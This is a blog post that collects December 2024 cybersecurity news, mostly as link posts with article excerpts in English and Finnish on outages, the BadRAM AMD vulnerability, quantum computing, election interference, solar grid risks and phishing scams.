This posting is here to collect cyber security news in December 2024.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in December 2024.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
221 Comments
Tomi Engdahl says:
Interesting trend.
Downdetector shows that around 12:30-1:00 pm central time, major service providers and websites, including Instagram, Facebook, Facebook Messenger, WhatsApp, Reddit, Okta, AWS, Microsoft 365, The Navy Federal Credit Union, Snapchat, Cloudflare, as well as major telcos like T-Mobile, Bell, Telus and Shaw(Rogers) all experienced a spike in user reported downtime, which all seem to have started spiking at the same time, and trailing off at the same time.
I wonder if this was a test of bad actors to see how the providers and the public would respond when major services all go down at once, or whether a major network issue just happened to take a bunch of different companies offline at the same time
https://www.facebook.com/share/p/G5mEfDUhoHV5qz3H/
When in doubt, it’s a DNS or BGP issue.
Tomi Engdahl says:
https://www.tweaktown.com/news/102082/kioxias-cm7-pcie-5-0-nvme-ssd-cryptographic-module-receives-fips-140-3-level-2-validation/index.html
Tomi Engdahl says:
What the EU’s new software legislation means for developers
The EU Cyber Resilience Act will introduce new cybersecurity requirements for software released in the EU. Learn what it means for your open source projects and what GitHub is doing to ensure the law will be a net win for open source maintainers.
https://github.blog/open-source/maintainers/what-the-eus-new-software-legislation-means-for-developers/
Tomi Engdahl says:
Meta down: Facebook, Instagram, WhatsApp, Messenger and Threads not working amid major outage
Apparent technical problem knocks all of company’s apps offline
https://www.independent.co.uk/tech/facebook-down-instagram-meta-outage-b2662836.html#Echobox=1733941975
All of Meta’s platforms – Facebook, Instagram, WhatsApp, Messenger and Threads – appear to have broken in a huge outage.
The company’s systems appear to have suffered a major technical issue at around 6pm UK time, or 10 am local pacific time, according to tracking website Down Detector. Problems appeared to be widespread across the world, the site showed.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/ivanti-warns-of-maximum-severity-csa-auth-bypass-vulnerability/
Tomi Engdahl says:
https://louhosdigital.fi/blogi/somesta-on-tullut-huijareiden-leikkikentta-nain-valtat-yleisimmat-konnankoukut?utm_source=meta&utm_medium=paid%20social&utm_campaign=huijaukset-fb&hsa_acc=1199843640121417&hsa_cam=120214571601720181&hsa_grp=120214571601740181&hsa_ad=120214571601760181&hsa_src=fb&hsa_net=facebook&hsa_ver=3&fbclid=IwY2xjawHC0jxleHRuA2FlbQEwAGFkaWQBqxaEVVfuBQEdY66ktP_UXOyYT5VTaB7GuHobSxWsNs1rwOs780-gDcdgLC_LJeeCmELS_aem_55hcewASkWo1VDGG0WQYtA
Tomi Engdahl says:
https://www.uusiteknologia.fi/2024/12/11/androxgh0st-iskee-iot-laitteisiin-ja-kriittiseen-infrastruktuuriin/
Tomi Engdahl says:
Viron järjestelmässä on havaittu riskejä ja ongelmia heti alusta lähtien ja muutama vuosi sitten taas lisää tässäkin raportissa. Toivottavasti joku ottaa ne siellä tosissaan. Itse en usko, että järjestelmää saadaan koskaan riittävän luotettavaksi. https://news.postimees.ee/6849632/e-voting-task-force-finishes-report-including-25-proposals-for-improving-system
Kenneth Falck Mikään järjestelmä ei ole riskitön. Jokaiset vaalit ovat toteutettu suunnitelmien mukaan. Näissä on monivaiheiset varmistukset ja valitustietkin käytettävissä. Järjestelmä on todellakin riittävän luotettava. Erityisen haitallisena olen silti pitänyt sitä, että Venäjään kytköksissä olevat puolueet ovat levitelleet epäluottamusta juuri vaalien alle. Yhdellä puolueella on paikoitellen varsin iäkäs äänestäjäkunta, joten eivät hyödy esimerkiks nuorten ulkovirolaisten ja diginatiivien nuorten antamista äänistä. Mutta EU-vaalien perinteisessä paperiäänestyksessä sentään näki edellisten noin >10 äänestäjän henkilötunnukset. Tästä tosin ei ole kukaan kiinnostunut.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/romanias-election-systems-targeted-in-over-85-000-cyberattacks/?fbclid=IwY2xjawHHd1BleHRuA2FlbQIxMQABHSo3H5eZhHIrztQY6I2SgBtlRC59h1AeHrfEvXDhcjMtpeHj1nl5PrFKtQ_aem_d0gqAkVKPEtKetCiR0BTCQ
Tomi Engdahl says:
No Doughnuts Today? Cyberattack Puts Krispy Kreme in a Sticky Situation
The doughnut and coffeehouse chain confirmed a cyberattack took out parts of its online ordering system in parts of the United States.
https://www.securityweek.com/no-doughnuts-today-cyberattack-puts-krispy-kreme-in-a-sticky-situation/
Tomi Engdahl says:
https://www.securityweek.com/apple-pushes-major-ios-macos-security-updates/
Tomi Engdahl says:
BadRAM Attack Uses $10 Equipment to Break AMD Processor Protections
Academic researchers devise BadRAM, a new attack that uses $10 equipment to break AMD’s latest trusted execution environment protections.
https://www.securityweek.com/badram-attack-uses-10-equipment-to-break-amd-processor-protections/
Academic researchers have devised a new attack that relies on cheap equipment to provide false information to the system processor during startup and break AMD’s latest trusted execution environment guarantees.
Called BadRAM, the new attack uses $10 off-the-shelf equipment to break AMD SEV-SNP (Secure Encrypted Virtualization-Secure Nested Paging), cutting-edge memory integrity protections that rely on encryption and isolation to prevent information leaks and hypervisor-based attacks.
The attack, academics from KU Leuven, University of Lubeck, and University of Birmingham explained in a research paper (PDF), uses a rogue memory module that lies about its size to deceive the processor into revealing encrypted memory.
To break SEV, however, the attacker requires physical access to the memory module’s embedded SPD chip, which stores information about the module’s size.
By tampering with the chip, the attacker can cause aliasing in the physical address space, bypassing control mechanisms to manipulate memory mappings, and resulting in the full compromise of SEV-SNP’s attestation feature.
“We found that tampering with the embedded SPD chip on commercial DRAM modules allows attackers to bypass SEV protections — including AMD’s latest SEV-SNP version. For less than $10 in off-the-shelf equipment, we can trick the processor into allowing access to encrypted memory,” the researchers note.
By doubling the apparent size of the installed DRAM module, the researchers deceived the processor into using ghost addressing bits, creating an aliasing effect where two different physical addresses would refer to the same DRAM location.
After locating these aliases, the researchers discovered that the BadRAM attack could be used to tamper with or replay ciphertexts, and manipulate reverse map table data structure to introduce page-remapping attacks, which SEV-SNP is meant to mitigate.
The academics also discovered that Intel’s SGX protections prevent ciphertext replay or corruption attacks, although they allow write access patterns to be discerned, and that certain DRAM vendors leave SPD unlocked, which could lead to software-only BadRAM attacks.
On Tuesday, AMD announced firmware updates that mitigate the underlying BadRAM weakness. Tracked as CVE-2024-21944 (CVSS score of 5.3), the vulnerability impacts AMD’s 3rd and 4th generation EPYC processors (formerly codenamed Milan, Milan-X, Genoa, Bergamo, Genoa-X, and Siena).
“Improper input validation for DIMM serial presence detect (SPD) metadata could allow an attacker with physical access, ring0 access on a system with a non-compliant DIMM, or control over the Root of Trust for BIOS update, to potentially overwrite guest memory resulting in loss of guest data integrity,” AMD says in its advisory.
AMD notes that using memory modules that lock SPD, following physical security best practices, and applying the newly released AGESA and SEV firmware updates would mitigate the attack, and the academics verify that the updates resolve the issue.
“BadRAM can be mitigated by considering the SPD data as untrusted and performing memory alias checking at boot time, as seen in Intel’s Alias Checking Trusted Module for TDX and scalable SGX. The countermeasures introduced by AMD will similarly validate SPD metadata during the boot process in trusted firmware,” the researchers note.
https://badram.eu/
Tomi Engdahl says:
https://www.securityweek.com/google-pays-55000-for-high-severity-chrome-browser-bug/
Tomi Engdahl says:
Now on Demand: Inside a Hacker’s Playbook – How Cybercriminals Use Deepfakes
This eye-opening session that pulls back the curtain on how bad actors exploit social engineering tactics, like deepfake technology and Business Email Compromise (BEC).
https://www.securityweek.com/webinar-today-inside-a-hackers-playbook-how-cybercriminals-use-deepfakes/
Tomi Engdahl says:
https://www.securityweek.com/atlassian-splunk-patch-high-severity-vulnerabilities/
Tomi Engdahl says:
Google’s Willow Chip Signals the Urgency of Post-Quantum Cryptography Migration
Google’s Willow quantum chip marks a transformative moment in quantum computing development.
https://www.securityweek.com/googles-willow-chip-signals-the-urgency-of-post-quantum-cryptography-migration/
Forget the 10 septillion years needed for a classical computer to solve this problem, and focus instead on the falling number of necessary error correction qubits.
Google announced its latest quantum computing advance, the Willow chip, on December 9, 2024. The announcement focuses on two aspects: current power and future potential.
The power is demonstrated by large numbers: Willow can solve a problem in less than five minutes that would take a classical supercomputer 10 septillion years to solve. Now, even though the supercomputer and the length of time it would take are not factual but obviously simulations, and even though the problem may have been developed specifically to be solved by Willow, this is mighty impressive.
Karl Holmqvist, founder and CEO of Lastwall, explains the process. “What Google achieved with Willow involves something called random circuit sampling (RCS), which generates random quantum circuits specifically designed as a benchmark for quantum computers,” he told SecurityWeek.
“RCS is about creating complex pseudo-random quantum circuits, making it extremely difficult for classical computers to process. In that sense, it’s a contrived problem because it’s built specifically to test quantum systems. However, it is also an accepted benchmark for evaluating whether a system can harness quantum effects.”
It is and is meant to be impressive. Note that in 2019 Google bragged about achieving ‘quantum supremacy’ with a quantum computer that could solve a different problem that would take a supercomputer 10,000 years to solve in around 200 seconds. Willow shows a remarkable improvement in just five years.
But it is perhaps not as impressive as we are meant to assume. There is no apparent dramatic decrease in the time to a cryptographically relevant quantum computer (CRQC) – that point at which a quantum computer will be able to decrypt current PKE encryption. To put it bluntly, it is specifically CRQC rather than quantum computing in general that is of current concern to cybersecurity professionals.
It is the other part of the Willow announcement that is of greater importance — Google appears to have made a breakthrough in quantum error correction. Qubits are so inherently fragile (prone to errors from environmental noise, decoherence, and operational imperfections) that each ‘functioning’ qubit requires many more qubits to correct the errors. Without that error correction, a quantum computer effectively decays into a classical computer.
Willow has 105 qubits. IBM’s Osprey says it has 433 qubits. “What’s the use of a high qubit count if error rates are so high the results cannot be trusted?” asks Skip Sanzeri, co-founder and COO, QuSecure. “I think it’s safe to say that IBM and others have not yet achieved these error correction milestones or most likely we would have heard about them. We can bet that all eyes will be on Google as other companies and nation-states will attempt to mimic Willow’s error correction.”
Google has demonstrated with Willow that it can increase the number of qubits while simultaneously reducing the reliance on error correcting qubits.
“This is a major watershed moment for quantum computation design, marked by the demonstration of below-threshold scaling capabilities,”
It is impossible to say that Willow and Google’s below threshold error correction brings the day of CRQC any closer, but it does have that potential. The real lesson for security folk is that we no longer dare delay our cryptographic migration to NIST’s post quantum and agile encryption algorithms. To do so goes beyond folly.
https://www.securityweek.com/post-quantum-cryptography-standards-officially-announced-by-nist-a-history-and-explanation/
Tomi Engdahl says:
Lawrence Abrams / BleepingComputer:
A global outage has hit Facebook, Instagram, Threads, and WhatsApp, starting at approximately 12:40pm ET; Meta says it’s “99% of the way” to resolving the issue — Facebook, Instagram, Threads, and WhatsApp suffered a massive worldwide Wednesday afternoon, with services impacted in varying degrees based on user’s region.
Facebook, Instagram, WhatsApp hit by massive worldwide outage
https://www.bleepingcomputer.com/news/technology/facebook-instagram-whatsapp-hit-by-massive-worldwide-outage/
Tomi Engdahl says:
Maxwell Zeff / TechCrunch:
OpenAI says ChatGPT, API, and Sora traffic has largely recovered, after a multi-hour outage, and that it is monitoring the situation to ensure full resolution
ChatGPT and Sora experienced a major outage
https://techcrunch.com/2024/12/11/chatgpt-and-sora-are-down/
Tomi Engdahl says:
The Firefox feature never really worked – here’s what to use instead
https://www.techradar.com/computing/firefox-is-ending-do-not-track-but-there-are-better-ways-to-protect-your-privacy-heres-what-i-recommend?utm_source=facebook.com&utm_campaign=socialflow&utm_content=techradar&utm_medium=social&fbclid=IwZXh0bgNhZW0CMTEAAR3ajiP-xmQkWr5y3QmSwCRlp9HDCahfRsAXTVoR7dNUytKDnaSwdiLQL2Q_aem_1iqCdbfo-F5Yd_3F_wM2_A
Firefox is ending Do Not Track, but there are better ways to protect your privacy – here’s what I recommend
Tomi Engdahl says:
Read more: https://www.iflscience.com/your-password-may-be-stronger-than-us-nuclear-codes-during-the-cold-war-77173
Tomi Engdahl says:
“And so the “secret unlock code” during the height of the nuclear crises of the Cold War remained constant at OOOOOOOO
Tomi Engdahl says:
Marietje Schaake / Financial Times:
The EU’s TikTok scrutiny over the Romanian presidential election will be a litmus test for the DSA and should finally uncover details of algorithmic influence
Romania’s cancelled election is a lesson in social media manipulation
Investigations should finally shed light on how algorithms win votes and influence people
https://www.ft.com/content/2855bf6f-4b40-412d-8249-64c90370bbd2
Romania shocked the world last month when it voted for an outsider with ultranationalist views as president. Călin Georgescu was polling poorly just weeks before the election. TikTok was crucial to his sudden success. It also appears to have been a key facilitator of foreign interference from Russia.
Romania’s constitutional court has since opted to annul the results of the first election round. All eyes are once more on social media platforms and their ability to influence election outcomes. Until now, extraordinary discretion has been left to the companies curating our information ecosystem — Romania may turn the tide.
Suspicious online accounts, polls and paid influencers sharing political content are all seen as key online tools for influencing Romanian votes.
Within the country, intelligence services have accused Russia of aggressively using TikTok to promote Georgescu. The US state department describes “malign cyber activity”. In Europe, the Digital Services Act (DSA) has been invoked to impose a “retention order” that demands TikTok preserve all data related to European elections for scrutiny. A company representative for TikTok emphasised its compliance with EU law in a recent hearing before the European parliament.
After years of lingering questions about the precise impact of social media platforms on democracy, European investigations should finally shed light on the details of algorithmic influence. There will be lessons learned around the world.
Most importantly, it will be a litmus test for the enforcement of the DSA. This recently implemented law seeks to minimise harm by spelling out content moderation obligations for large online platforms. That includes mitigating systemic risks such as to the electoral process.
TikTok points out that it does not allow political advertisements and enforces measures against covert influence. Yet such corporate rules may not always be enforced. Researchers at non-profit organisation Reset Tech, Check First and EU DisinfoLab found evidence of co-ordinated posts about Georgescu on social media and stated that Meta had also failed to enforce its own policies, which “demonstrates Meta’s failure to follow the European Commission’s recommendations to comply with the DSA”.
Europe’s new law can challenge failures of self-regulation. For democracies under attack, avoiding an overestimation of disinformation and manipulation, while ensuring the risks are not underestimated, is key to political and policy responses.
Detailed independent research is also crucial for fostering greater public understanding. Societal resilience against attempts to undermine democracy must be fact based.
That democracies and electoral processes are under attack is clear — from foreign interference to domestically-fuelled efforts intended to mislead and polarise voters.
But assessing the exact impact and causality has been a challenge for academics around the world. Companies typically don’t want people looking under the hood of their businesses and have shielded proprietary data. Insights gained in Romania’s case will indirectly shed light on any manipulation that takes place via social media platforms in other contexts.
But events in Romania will reach beyond a single company. It will challenge the practice of allowing corporate rules to act as democracy’s best defence.
Details about the interplay between the Kremlin subversion tactics and social media algorithms will hopefully play a significant role in ensuring accountability.
Tomi Engdahl says:
Sheena Vasani / The Verge:
Google rolls out two updates to Android’s unknown tracker alerts feature, letting users pause location updates from their phone and pinpoint unfamiliar trackers — Google is rolling out two new updates to its unknown tracker alerts feature that should make it easier for Android device owners …
Android is making it easier to find unknown trackers to prevent stalking
/ The new features will allow Android device owners to pause location updates and locate unfamiliar trackers.
https://www.theverge.com/2024/12/11/24318992/android-find-my-device-bluetooth-tracker-stalking
Tomi Engdahl says:
Yritykset tarvitsevat miljoonia uusia kyberturvaajia
https://etn.fi/index.php/13-news/16950-yritykset-tarvitsevat-miljoonia-uusia-kyberturvaajia
Yritykset ympäri maailman ovat palkanneet jo 5,4 miljoonaa kyberturva-asiantuntijaa, mutta samaan aikaan alalla tarvitaan vielä 4,7 miljoonaa työntekijää lisää turvaamaan organisaatioiden toimintaa. Tämä käy ilmi AltIndex.com-sivuston julkaisemista tiedoista.
Kyberrikollisuuden kustannukset ovat kasvaneet huolestuttavasti ja ylittävät jo 9,2 biljoonan dollarin rajan vuonna 2024. Ennusteiden mukaan summa saattaa nousta peräti 15,6 biljoonaan dollariin vuosikymmenen loppuun mennessä. Tämä kasvu tapahtuu, vaikka yritykset investoivat merkittävästi kyberturvan kehittämiseen.
Kyberhyökkäykset, kuten kiristysohjelmat, tietomurrot ja tietojenkalastelu, aiheuttavat miljardien dollareiden vahinkoja organisaatioille. Vahinkoja syntyy muun muassa varastetuista tiedoista, liiketoiminnan keskeytymisestä ja mainehaitoista. Kyberrikollisuuden jatkuvasti laajeneva uhka korostaa kyberturva-ammattilaisten kriittistä roolia.
Vuonna 2024 kyberturva-alan työvoima kasvoi vain 0,1 %, mikä on pienin kasvu kuuteen vuoteen. Samaan aikaan alan työntekijävaje kasvoi peräti 19 %, mikä tarkoittaa, että yritykset tarvitsevat nyt enemmän ammattilaisia kuin koskaan aiemmin. Erityisen suuri tarve on Aasiassa, jossa yritykset kaipaavat 3,3 miljoonaa kyberturvaajaa, mikä on 26 % enemmän kuin viime vuonna. Pohjois-Amerikassa vajetta on puoli miljoonaa työntekijää ja Euroopassa yli 400 000.
Tomi Engdahl says:
Stubbista leviää valevideo
Uutistoimisto AFP:n faktantarkastajat ovat todenneet videon väärennetyksi.
https://www.is.fi/politiikka/art-2000010897505.html
Tasavallan presidentti Alexander Stubbista jaetaan sosiaalisessa mediassa videota, joka sisältää valheellista tietoa.
Videolla Stubbin annetaan ymmärtää antavan tukensa Nigerian separatisteille, jotka ovat jo vuosikymmeniä kampanjoineet Nigeriasta irtautumisen ja itsenäisen Biafran valtion luomisen puolesta.
Uutistoimisto AFP:n faktantarkastajat ovat todenneet videon valheelliseksi. Alkuperäisessä, X:ssä marraskuussa julkaistussa videossa presidentti Stubb puhuu talvisodasta ja ilmaisee tukensa Ukrainalle.
– Suomen talvisota kesti 105 päivää, teidän sotanne on kestänyt kymmenen kertaa kauemmin. Tuemme teitä niin kauan kuin sota kestää, Stubb sanoo.
Valheellisessa videossa julkaistussa kuvatekstissä sanotaan videon olevan ”Suomen presidentin lupaus”. Videota on jaettu sosiaalisessa mediassa kymmeniätuhansia kertoja.
Stubbin Ukrainalle tekemään videoon on upotettu kuva Simon Ekpasta, joka on nigerialais-suomalainen. Ekpa on puhunut itsestään nigerialaisen separatistiryhmän johtajana. Hän on pyrkinyt Suomesta käsin vaikuttamaan siihen, että Biafran valtio irtautuisi Nigeriasta.
Tomi Engdahl says:
Krispy Kreme confirms online ordering disruption following cyberattack
The company’s IT department, working alongside external cybersecurity specialists, has initiated an investigation to determine the extent and nature of the attack.
https://www.techmonitor.ai/technology/cybersecurity/krispy-kreme-confirms-online-ordering-disruption-following-cyberattack?fbclid=IwY2xjawHH12lleHRuA2FlbQIxMQABHeU6zdnom2LrjiI-AlrXEARFWySKnFMmHQkDuDs4qUAdOW0h6nx9KFfI7Q_aem_MX1ByFIETs5jLt6q4QEUMQ
Tomi Engdahl says:
Tässäkin taas yksi hybridivektori, jota täytyy pitää silmällä. Aurinkopaneelien ohjausjärjestelmien tietoturva ei ole välttämättä ihan priimakunnossa, ja vaikka ne ovat hajautettuja, niitä voi ainakin teoriassa korkata kerralla isot määrät. En tiedä millainen monokulttuuri näissä tuotteissa on vallalla, että onko turhan suuri osa saman valmistajan koodaamia.
Hacking Rooftop Solar Is a Way to Break Europe’s Power Grid
The rush to install millions of smart panels is creating vulnerabilities inside electricity networks
https://www.bloomberg.com/news/articles/2024-12-12/europe-s-power-grid-vulnerable-to-hackers-exploiting-rooftop-solar-panels?fbclid=IwZXh0bgNhZW0CMTEAAR3zsCxEKrcPeyLk5cp5wsvT8rIGCxWf1BAfe7xqhtbm9wme41IIeQvTni0_aem_OifU9ZCiNZCZfysoYotp0Q
All it takes is one hacker and a batch of faulty solar panels to threaten the safety of Europe’s electric grid.
Vangelis Stykas, a cybersecurity consultant, said he figured out how to do it. Using a laptop and smartphone at his home in Thessaloniki, Greece, Stykas bypassed firewalls in panels around the world and gained access to more power than runs through Germany’s entire system.
The “white-hat hacker,” who tests software so companies can fix flaws, said he got far enough inside the controls that he could have turned the devices off, dramatically tipping the supply-demand balance for the power network. Such a drastic fluctuation could stress a grid to the point where it shuts down as a fail-safe, he said.
The exponential growth of rooftop solar systems means millions more connection points to the grid, creating a massive vulnerability that hackers could exploit. The most serious impact may be cascading grid failures across the continent. That risk is a growing concern for utilities and governments dealing with more cyberattacks every year.
“We are growing increasingly dependent on these devices, but even as they become critical national infrastructure, they are not fully secure,” said Stykas, 41, co-founder of security firm Atropos.ai. “If these can be hacked, that leaves Europe’s grid, which underpins our entire lifestyle, vulnerable.”
The average number of weekly cyberattacks on utilities worldwide doubled within two years to about 1,100, and they’re occurring more frequently as digitalization takes hold, the International Energy Agency said. The European Union suffered more than 200 reported cyberattacks on energy infrastructure last year, and that number has “largely increased in recent years.”
Hostile intentions can range from greed (ransom payments or market manipulation) to terrorism (putting nations in the dark) to war (see Russia’s cyberattacks on Ukraine’s power systems). In Japan, hackers took over solar monitors and used them to steal from bank accounts, local media reported.
Instigators can range from a small group of “hacktivists” motivated by ideology to a state-supported battalion working around the clock.
The threat is serious enough that NATO ran a security drill in Sweden to find and fix vulnerabilities in solar, wind and hydroelectric systems.
The military alliance says it’s the world’s first such exercise, and the scenario comes amid wars in Ukraine and the Middle East, and the West’s fracturing relationships with Russia and China. The latter is the biggest maker of solar panels.
The EU’s biennial Cyber Europe exercise in June focused on energy for the first time. The hypotheticals included responding to state-directed threats against operators of power distribution systems and gas storage sites.
Taking down a nation’s electric grid would be an extreme outcome given that utilities fight off cyberattacks every day and their most critical systems are typically behind multiple layers of security.
As solar proliferates, those tasked with patching any flaws struggle to keep pace with those exploiting them. Germany connected more than 1 million panels to people’s homes and businesses last year — more than the previous six years combined.
The IEA has forecast that 100 million households worldwide will rely on rooftop solar panels for energy by 2030. That’s quadruple the current amount.
Many of those makers focus on keeping prices low, so they’re not spending money on experienced programmers to design sophisticated protection software.
“The speed at which the sector is growing means that people may not be investing as much into risk management and security as they ordinarily would,” said Dick O’Brien, principal intelligence analyst at cybersecurity provider Symantec.
Grid Cybersecurity Costs To Soar Under Net Zero
Annual spending on grid cybersecurity in net zero scenario
In his tests to control the panels, Stykas targeted circuits called inverters that are connected to the cloud and convert sunlight into electricity for the grid.
A bad actor could turn the inverters off, infect them with malware or plant digital booby traps for activation later. Stykas told the makers he cracked their firewalls, but only some made fixes, he said.
Earlier this year, attackers accessed about 800 solar power monitoring devices made by Japan-based Contec Co. Ltd. and used them as pathways to steal from bank accounts, according to local media. The hackers exploited back doors installed surreptitiously, the manufacturer said in May.
As Europe’s biggest economy and industrial heartland, Germany is a high-value target. The country has earmarked tens of billions of dollars for clean technology add-ons and upgrades to help cut carbon emissions by two-thirds this decade.
Renewables to Supply Half of All Power By 2030
Share of global electricity generation
Solar vulnerabilities “are a cause for concern” and “the risk is growing,” the regulatory Federal Network Agency said. RWE AG, Germany’s biggest electricity producer, has cybersecurity “at the top of its agenda,” spokesperson Sarah Knauber said without elaborating.
Next door in the Netherlands, consultant Secura BV identified 27 scenarios in which a cyberattack could significantly disrupt solar installations and, consequently, “hit the energy sector as a whole.”
The UK has a high penetration of renewables, especially wind. More than 95% of energy companies surveyed — including some producing clean power — suffered major disruptions from cyberattacks in the past year, according to Kaspersky Labs Ltd., a security provider. The primary threat was posed by smart devices, the respondents said.
The EU has implemented a handful of laws in recent years to bolster cybersecurity defenses. The European Commission is working on new rules to strengthen protections for solar devices, but they will give companies as long as 18 months to comply. A spokesman declined to comment.
The first report assessing the bloc’s readiness was released this month, and it listed energy as one of the top 10 targets for hackers. Supply chains were especially vulnerable.
“If we don’t take it seriously, then people are going to lose trust in the network,” said Nathan Morelli, head of cybersecurity at SA Power Networks in Australia, which has the highest solar penetration in the world. “That ultimately impacts our ability to encourage growth and further development in renewables.”
Tomi Engdahl says:
Kauppahuijaus yllätti asiantuntijan: ”Minä nyt saman tien tästä tilaan”
Kuka tahansa voi haksahtaa nettihuijaukseen. Tästä todistaa tietoturva-asiantuntijan kokemus.
https://www.is.fi/digitoday/tietoturva/art-2000010897592.html
Liikenne- ja viestintävirasto Traficomin Kyberturvallisuuskeskuksen tietoturva-asiantuntija Samuli Könönen joutui nettihuijarin uhriksi. Hän kertoi kokemuksestaan Digi- ja väestötietoviraston seminaarissa keskiviikkona.
Könönen oli etsinyt itselleen uutta reppua, kun eräänä päivänä sosiaalisessa mediassa tuli vastaan mainos. Siinä näkyi samanmerkkisiä reppuja, joita Könönen oli jo aiemmin katsellut.
– Vitsi kun oli halvalla, minä nyt saman tien tästä tilaan, Könönen kuvailee mietteitään tuolloin.
Myöhemmin samana päivänä Könönen havahtui siihen, ettei repusta ollut tullut minkäänlaista tilausvahvistusta. Selaushistoriaansa kaivelemalla Könönen tajusi, ettei verkkokauppa ollutkaan kovin luotettava.
– Soitto pankkiin ja maksukortin kuolettaminen, Könönen kiteyttää seuraavat välittömät toimenpiteensä.
Tomi Engdahl says:
Data Breaches
Phishing: The Silent Precursor to Data Breaches
Phishing is more than a mere nuisance—it is a formidable precursor to destructive data breaches.
https://www.securityweek.com/phishing-the-silent-precursor-to-data-breaches/
Tomi Engdahl says:
Älä klikkaa äläkä skannaa mitään, mitä et tunne
https://etn.fi/index.php/13-news/16953-aelae-klikkaa-aelaekae-skannaa-mitaeaen-mitae-et-tunne
Generatiivinen tekoäly tekee tietojenkalastelusta yhä tehokkaampaa. 9Jopa 98-99 prosenttia phishing-viesteistä tulee sähköpostitse, sanoo Check Pointin tietoturva-asiantuntija Jarno Ahlström. Tämä tarkoittaa, ettei meiliboksissaan kannattaisi oikeastaan klikata mitään tuntematonta.
- Sähköpostin osuus puhtaan phishingin välityskanavana on tällä hetkellä tuota luokkaa. Jos katsotaan phishingiä hyökkäysten näkökulmasta, niin useat tutkimukset sanovat, että yli 90 prosenttia kaikista kyberhyökkäyksistä alkaa kalasteluviestillä, Ahlström muistuttaa.
Tietojenkalastelussa generatiivinen tekoäly ja suuret LLM-kielimallit ovat oikeastaan mullistaneet markkinan. Usein rikolliset käyttävät avoimia malleja. Tiedetään tapauksista, joissa Metan Llama-variantteja on käytetty rikollisten toimesta, mutta Ahlström ei halua nostaa mitään yksittäistä mallia tikun nokkaan.
- Maksuttomuus tai hyvin halpa hinta ovat tietysti aina houkuttelevampia kuin yritetään maksimoida tuottoja. Mutta ihan yhtä lailla tässä voidaan hyödyntää suljettuja malleja. Niihin rakennettuja suojausmekanismeja on mahdollista kiertää. Tarkoitushan on, että näitä ei käyttäjäkään erottaisi täysin normaalista ja asianmukaisesta viestinnästä.
Avoin LLM-malli sopii kalasteluviestin paikallistamiseen aivan mainiosti. – Jos phishing-viesti ajatellaan ihan vain viestinä, ei mallia tarvitse edes sen kummemmin kräkätä lokalisointia ajatellen. Yksittäisten lauseiden kääntäminen on varsin helppoa ja hankala erottaa asiallisesta viestinnästä.
Tomi Engdahl says:
Joku väärensi suomalaispankkien nettisivut
Liikkeellä on uskottavasti väärennettyjä pankkisivustoja.
https://www.iltalehti.fi/digiuutiset/a/4e0f90e4-f795-4b5c-9a8b-2f887bd0dbca
Liikenne- ja viestintävirasto Traficomin Kyberturvallisuuskeskus varoittaa viikkokatsauksessaan väärennetyistä pankkisivustoista.
Kyberturvallisuuskeskus kertoo, että sen tietoon on tullut niin Aktian kuin Pop-pankinkin sivuja muistuttavia huijaussivustoja. Viranomainen kutsuu väärennöksiä uskottaviksi.
Pankit, poliisi ja muut viranomaiset ohjeistavatkin menemään verkkopankkiin kirjoittamalla palvelun virallisen osoitteen verkkoselaimen osoitekenttään. Turvallisen, itse syötetyn osoitteen voi tallentaa selaimen kirjanmerkkeihin myöhempää käyttöä varten.
Tomi Engdahl says:
Traficomin tietomurto: 20-vuotias mies perusteli tekoaan hälyttävällä tavalla
20-vuotias mies on perustellut toimintaansa muun muassa sillä, että hänellä oli ”liikaa aikaa”.
https://www.iltalehti.fi/digiuutiset/a/73a00ad0-23ad-47de-98d4-8d6dbaa11b57
Traficomin törkeän tietomurron esitutkinta on nyt valmistunut. 20-vuotias mies on myötänyt teon kuulusteluissa ja kertonut motiivikseen ”kokeilemisen halun ja liian ajan”. Käyttäjätunnukset ja salasanat mies oli saanut pimeästä verkosta.
Mies murtautui helsinkiläisyrityksen ohjelmistoon ja pääsi käsiksi Traficomin ajoneuvorekisterin tietoihin 6.–14. toukokuuta kuluvaa vuotta.
Mies hyödynsi tietomurrossa kahden asiakasyrityksen työntekijöiden tunnuksia ja teki niillä kyselyitä ajoneuvorekisteriin. Miehen tekemät haut kohdistuivat noin 65 000 ajoneuvon omistajan ja haltijan tietoihin.
Epäilyksen mukaan mies urkki noin 50 ajoneuvon omistaja- ja haltijatietoja. Poliisi on ollut heihin yhteydessä. Esitutkinnassa ei kuitenkaan löytynyt viitteitä siitä, että mies olisi tallentanut tietoja johonkin tai tarkastellut muita kuin edellä mainittuja viittäkymmentä.
Tapaus on siirtynyt syyteharkintaan. Traficomin tietomurron lisäksi poliisi epäilee, että mies haki tietoja myös Verohallinnon positiivisesta luottorekisteristä. Sieltä mies ei kuitenkaan saanut tietoja – kyselyiden vastaukset oli toimitettu erillisenä viestinä asiakasyritykselle, jonka nimissä tietoja haettiin.
– Perusteellisista tutkimuksista huolimatta ei löydetty merkkejä siitä, että Traficomilta ja Verohallinnolta vietyjä tietoja olisi käytetty väärin
Tomi Engdahl says:
Lisätietoa tunnetun suomalaishotellin tietomurrosta
Hotel Tahko kehottaa valppauteen mahdollisten tietojenkalasteluyritysten varalta.
https://www.iltalehti.fi/digiuutiset/a/18517dc3-3a89-4bc9-843e-f4a0e6fcbd70
Tomi Engdahl says:
Jordan Novet / CNBC:
Sublime Security, which uses AI to scan companies’ and political campaigns’ emails for phishing, raised a $60M Series B, taking its total funding to $93.8M
Venture capitalists bet on Sublime, a startup bringing AI to email security
https://www.cnbc.com/2024/12/12/email-security-startup-sublime-raises-60-million.html
Generative AI has given attackers a way to automate the process of crafting emails that could help them crack corporate systems.
Abnormal Security, which uses generative AI to help spot and block such email threats, reached a $5 billion valuation this year.
Now investors have put $60 million into Sublime Security, which aims to use AI to protect inboxes.
Across the world, companies rely on Microsoft and Google
to administer email accounts for employees. Keeping all those mailboxes secure, however, is a business opportunity.
Proofpoint went public in 2012, and as enterprises migrated to the cloud, many adopted the company’s secure email gateway software as a precautionary measure. But private equity firm Thoma Bravo bought Proofpoint in 2021, and another provider, Mimecast, went private in 2022.
Then generative artificial intelligence took off. The trending technology gave more ammunition to hackers, as well as new tools for security companies that promise to defend clients against attacks.
Now, a new set of companies are gaining traction in a mature market.
